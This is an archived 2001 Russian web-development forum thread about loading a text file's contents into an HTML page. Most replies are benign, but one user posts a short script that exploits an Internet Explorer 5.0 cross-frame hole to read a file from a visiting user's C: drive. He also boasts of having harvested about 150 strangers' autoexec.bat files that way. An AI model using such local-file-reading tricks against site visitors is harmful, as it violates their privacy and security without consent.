Форум Flasher.ru
Ближайшие курсы в Школе RealTime
Список интенсивных курсов: [см.]  
  
Специальные предложения: [см.]  
  
 
Блоги Правила Справка Пользователи Календарь Сообщения за день
 

Вернуться   Форум Flasher.ru > Архив Flasher.ru > Работа над сайтом > DHTML/JS/CSS

Версия для печати  Отправить по электронной почте    « Предыдущая тема | Следующая тема »  
Опции темы Опции просмотра
 
Создать новую тему  
Старый 12.11.2001, 17:53
louie вне форума Посмотреть профиль Отправить личное сообщение для louie Найти все сообщения от louie
  № 1  
louie

Регистрация: Aug 2001
Адрес: without complains
Сообщений: 34
Отправить сообщение для louie с помощью Yahoo
По умолчанию ASCII text -> HTML document ? vozmozhno?

Privet,

Takoi vot voprosik: Mozhno li sdelat' takoi HTML (mozhet s document.write() ili chego eshe), kotori chast' svoego soderzhania "chitala" iz obiknovennogo TXT file-a?

spasibo
lu

Старый 12.11.2001, 18:35
SPV вне форума Посмотреть профиль Отправить личное сообщение для SPV Найти все сообщения от SPV
  № 2  
SPV
 
Аватар для SPV

Регистрация: Jan 2000
Адрес: St-Petersburg
Сообщений: 1,229
Отправить сообщение для SPV с помощью ICQ
Под ИЕ можно что-нить придумать...
__________________
Two beer or not two beer?...

Старый 13.11.2001, 11:20
louie вне форума Посмотреть профиль Отправить личное сообщение для louie Найти все сообщения от louie
  № 3  
louie

Регистрация: Aug 2001
Адрес: without complains
Сообщений: 34
Отправить сообщение для louie с помощью Yahoo
По умолчанию 2SPV

A esli konkretnee... ???

spasibo
lu

Старый 13.11.2001, 18:50
SPV вне форума Посмотреть профиль Отправить личное сообщение для SPV Найти все сообщения от SPV
  № 4  
SPV
 
Аватар для SPV

Регистрация: Jan 2000
Адрес: St-Petersburg
Сообщений: 1,229
Отправить сообщение для SPV с помощью ICQ
Код:
<html>
<head>
<script>
function filltext() {
  document.all.textdst.innerHTML = document.textsrc.body.outerText;
}
</script>
</head>
<body onload="filltext()">
<object id="textsrc" type="text/plain" data="text.txt" style="display: none;"></object>
<table border="1">
  <tr>
    <td>This is a text from "text.txt" file:</td>
  </tr>
  <tr>
    <td id="textdst">&nbsp;</td>
  </tr>
</table>
</body>
</html>
__________________
Two beer or not two beer?...

Старый 13.11.2001, 19:32
DarkStorm вне форума Посмотреть профиль Отправить личное сообщение для DarkStorm Найти все сообщения от DarkStorm
  № 5  
DarkStorm
 
Аватар для DarkStorm

Регистрация: Feb 2001
Адрес: Chicago, IL, USA
Сообщений: 47
Отправить сообщение для DarkStorm с помощью ICQ
Код:
<IFRAME  ID="I1"></IFRAME> 
<SCRIPT for=I1 event="NavigateComplete2(b)"> 
alert("Here is your file:\n"+b.document.body.innerText); 
</SCRIPT> 
<SCRIPT> 
I1.navigate("file://c:/test.txt"); 
setTimeout('I1.navigate("file://c:/test.txt")',1000); 
</SCRIPT>
В IE 5.xx можно сделать даже такой ХТМЛ, который часть своего содержимого будет читать с ТВОЕГО винта! Запиши этот скрипт куда-нить на бесплатный хостинг, создай файлик test.txt, с какой-нить простой текстовкой в корне диска C: и проверь...
В IE такое количество дырок, что читать файло я могу откуда угодно.
__________________
Трудно быть багом... :)

Старый 13.11.2001, 19:50
SPV вне форума Посмотреть профиль Отправить личное сообщение для SPV Найти все сообщения от SPV
  № 6  
SPV
 
Аватар для SPV

Регистрация: Jan 2000
Адрес: St-Petersburg
Сообщений: 1,229
Отправить сообщение для SPV с помощью ICQ
2DarkStorm
Если сама страница будет из инета, а фрэйм с винта, то скриптам будет Permission denied к его содержимому
Это относится к любым документам с другого хоста.
__________________
Two beer or not two beer?...

Старый 13.11.2001, 20:03
DarkStorm вне форума Посмотреть профиль Отправить личное сообщение для DarkStorm Найти все сообщения от DarkStorm
  № 7  
DarkStorm
 
Аватар для DarkStorm

Регистрация: Feb 2001
Адрес: Chicago, IL, USA
Сообщений: 47
Отправить сообщение для DarkStorm с помощью ICQ
В данном конкретном примере он его прочтет и даст доступ из обьектной модели страницы создавшей ифрейм. Это дырка cross-frame модели в ИЕ 5.0. И давно изветный баг (и давно вылеченый патчами).
Правда есть еще люди которые их вообще не ставят. Но этот пример действительно работающий! (в ИЕ 5.0)
__________________
Трудно быть багом... :)

Старый 13.11.2001, 20:07
DarkStorm вне форума Посмотреть профиль Отправить личное сообщение для DarkStorm Найти все сообщения от DarkStorm
  № 8  
DarkStorm
 
Аватар для DarkStorm

Регистрация: Feb 2001
Адрес: Chicago, IL, USA
Сообщений: 47
Отправить сообщение для DarkStorm с помощью ICQ
В свое время, с помощью этой и ей подобных дырок удалось собрать колекцию в полторы сотни autoexec.bat'ов
__________________
Трудно быть багом... :)

Старый 14.11.2001, 15:02
louie вне форума Посмотреть профиль Отправить личное сообщение для louie Найти все сообщения от louie
  № 9  
louie

Регистрация: Aug 2001
Адрес: without complains
Сообщений: 34
Отправить сообщение для louie с помощью Yahoo
По умолчанию Woooow...



spasibo DarkStorm i SPV bol'shoe... zarabotalo!!!

po etomu sluchau esho odin vopros
kakuiu knizhku posovetuite po JavaScrip-u? Ia tut chitau koe chto na CITForum-e no ochevidno chto etogo ne xvataet... podrobnoe opisanie klassov, neskol'so sovetov/promerov kak/chto delat'....

spasibo
lu

Старый 14.11.2001, 15:42
DarkStorm вне форума Посмотреть профиль Отправить личное сообщение для DarkStorm Найти все сообщения от DarkStorm
  № 10  
DarkStorm
 
Аватар для DarkStorm

Регистрация: Feb 2001
Адрес: Chicago, IL, USA
Сообщений: 47
Отправить сообщение для DarkStorm с помощью ICQ
Я бы посоветовал WDH. Сам недавно его нашел и очень активно использую.
http://allo.usaaa.ru/wdh/
ОГРОМНЕЙШИЙ справочник по всему что связано с вебом. При этом сам справочник постоянно находится в процессе разработки и обновления, можно найти инфу по самым последним технологиям и браузерам.
Да и сам талмуд сделан очень оригинально и на навороченнейших JavaScript'ах.

Плюс к нему еще и практическая часть с разжевыванием различных жизненных ситуаций и примеров.
http://allo.usaaa.ru/wdh/wdhplus.htm

Зеркалировать целиком! Однозначно!
Сорри автору этого чуда за несанкционированое копирование, но пользоваться с винта - намного удобней...
Если нужен, могу кинуть на мыло уже готовую копию.
__________________
Трудно быть багом... :)

Создать новую тему   Часовой пояс GMT +4, время: 04:03.
Быстрый переход
  « Предыдущая тема | Следующая тема »  

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


 


Часовой пояс GMT +4, время: 04:03.


Copyright © 1999-2008 Flasher.ru. All rights reserved.
Работает на vBulletin®. Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Администрация сайта не несёт ответственности за любую предоставленную посетителями информацию. Подробнее см. Правила.